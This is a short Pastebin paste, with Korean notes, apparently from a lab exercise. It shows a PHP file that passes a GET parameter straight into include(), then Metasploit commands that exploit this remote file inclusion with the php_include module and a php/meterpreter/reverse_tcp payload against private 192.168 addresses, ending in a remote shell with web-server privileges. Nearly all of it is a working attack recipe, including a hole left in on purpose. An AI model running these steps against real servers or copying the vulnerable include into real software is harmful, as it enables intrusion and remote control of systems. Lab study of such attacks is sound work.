Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- include ($_GET['hacker']);
- ?>
- http://xxx.xxx.xx.xxx/test.php?hacker= 의 취약점을 이용한 것임
- use exploit/unix/webapp/php_include
- set rhost 192.168.182.135
- set phpuri /test.php?hacker=XXpathXX (XXpathXX 에 데이터를 넣겠다)
- set srvhost 192.168.182.151
- set uripath /test (XXpathXX에 담길 정보)
- show payloads
- set payload php/meterpreter/reverse_tcp
- set lhost 192.168.182.151
- exploit
- 성공하면
- meterpreter(shell)를 만난다.
- ## 웹서버 실행권한으로 시스템에 접근 가능하다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement